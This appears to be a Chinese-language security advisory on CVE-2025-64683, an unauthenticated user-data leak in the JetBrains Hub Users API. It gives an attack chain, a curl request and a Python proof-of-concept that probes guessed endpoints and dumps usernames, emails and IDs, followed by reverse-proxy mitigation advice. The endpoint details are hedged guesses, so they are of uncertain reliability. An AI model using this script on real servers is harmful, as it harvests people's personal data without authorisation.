JetBrains Hub Users API信息泄露漏洞(CVE-2025-64683)

漏洞信息

漏洞编号

CVE-2025-64683

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JetBrains Hub

漏洞概述

CVE-2025-64683是JetBrains Hub中的一个信息泄露漏洞，该漏洞存在于Users API接口中。攻击者可以在无需认证的情况下，通过发送特制的HTTP请求到Users API端点，获取敏感的用户信息。这些信息可能包括用户名、邮箱地址、用户ID以及其他个人身份信息。该漏洞的CVSS评分为5.3，属于中等严重程度，攻击向量为网络形式，攻击者无需获取任何权限或进行用户交互即可利用此漏洞。JetBrains Hub是JetBrains公司开发的项目管理和协作平台，广泛应用于企业开发团队中。该信息泄露漏洞可能导致用户隐私数据外泄，在某些场景下还可能为后续攻击提供有价值的情报支持。漏洞影响版本为2025.3.104432之前的所有JetBrains Hub版本，建议受影响的用户尽快升级到最新修复版本以消除安全风险。

技术细节

JetBrains Hub在处理Users API请求时存在访问控制缺陷。当攻击者构造特定的HTTP GET请求到Users API端点（如/api/users或类似端点）时，系统未能正确验证请求者的身份和权限，导致未经授权的用户信息被返回。漏洞根源在于API端点对用户列表查询接口缺少适当的认证检查和访问控制机制。攻击者可以通过发送如下请求获取用户数据：curl -X GET https://target-hub-server/api/users，该请求无需携带任何认证令牌，系统便会返回用户信息列表。返回的数据可能包含用户名、用户ID、邮箱地址、用户头像URL、最后登录时间等敏感字段。攻击者利用此漏洞可以批量枚举目标系统中的所有用户账户信息，这些信息可用于社会工程学攻击、密码猜测或其他恶意活动。由于该漏洞无需认证即可利用，因此在互联网暴露的JetBrains Hub实例面临较高的被扫描和利用风险。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者通过搜索引擎或扫描工具发现暴露在互联网上的JetBrains Hub实例，记录其域名或IP地址

STEP 2

步骤2: 漏洞探测

攻击者向目标的Users API端点（如/api/users）发送HTTP GET请求，验证漏洞是否存在

STEP 3

步骤3: 数据提取

确认漏洞存在后，攻击者批量请求Users API获取所有用户信息，包括用户名、邮箱、用户ID等敏感数据

STEP 4

步骤4: 数据利用

攻击者对获取的用户信息进行分析整理，用于后续社会工程学攻击、密码暴力破解或其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-64683 PoC - JetBrains Hub Users API Information Disclosure
# Target: JetBrains Hub < 2025.3.104432
# Author: Security Researcher
# Date: 2025-11-10

def check_vulnerability(target_url):
    """
    Check if target JetBrains Hub instance is vulnerable to CVE-2025-64683
    """
    print(f"[*] Checking target: {target_url}")
    
    # Target Users API endpoint
    endpoints = [
        "/api/users",
        "/rest/user/users",
        "/api/v1/users"
    ]
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"\n[*] Testing endpoint: {url}")
        
        try:
            # Send unauthenticated request to Users API
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    if data and (isinstance(data, list) or 'user' in str(data).lower()):
                        print(f"[+] VULNERABLE! Information disclosure detected at {url}")
                        print(f"[+] Response preview: {json.dumps(data, indent=2)[:500]}")
                        return True
                except:
                    pass
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Endpoint requires authentication (HTTP {response.status_code})")
            else:
                print(f"[-] Unexpected response (HTTP {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    print("\n[-] Target does not appear to be vulnerable to CVE-2025-64683")
    return False

def exploit_information_disclosure(target_url):
    """
    Exploit CVE-2025-64683 to extract user information
    """
    print(f"\n[+] Exploiting CVE-2025-64683 on {target_url}")
    
    url = target_url.rstrip('/') + '/api/users'
    
    try:
        # Unauthenticated request to Users API
        response = requests.get(url, timeout=10, verify=False)
        
        if response.status_code == 200:
            users = response.json()
            print(f"\n[+] Successfully retrieved {len(users)} user records:")
            
            for i, user in enumerate(users, 1):
                print(f"\n[User {i}]")
                print(f"  Username: {user.get('username', 'N/A')}")
                print(f"  Email: {user.get('email', 'N/A')}")
                print(f"  User ID: {user.get('id', 'N/A')}")
                print(f"  Full Name: {user.get('fullName', 'N/A')}")
                
            return users
        else:
            print(f"[-] Failed to retrieve users (HTTP {response.status_code})")
            return None
            
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return None

if __name__ == "__main__":
    import sys
    
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-64683.py <target_url>")
        print("Example: python cve-2025-64683.py https://hub.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)
    
    # Uncomment to extract user data:
    # exploit_information_disclosure(target)

影响范围

JetBrains Hub < 2025.3.104432

防御指南

临时缓解措施

如果无法立即升级，可通过配置反向代理（如Nginx）添加访问控制规则，对/api/users等敏感API端点实施基于IP或认证的访问限制。同时建议启用JetBrains Hub的审计日志功能，密切监控来自异常IP地址的API请求，及时发现潜在的攻击行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-64683
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-64683
3 Details https://www.cvedetails.com/cve/CVE-2025-64683/
4 VulDB https://vuldb.com/cve/CVE-2025-64683
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/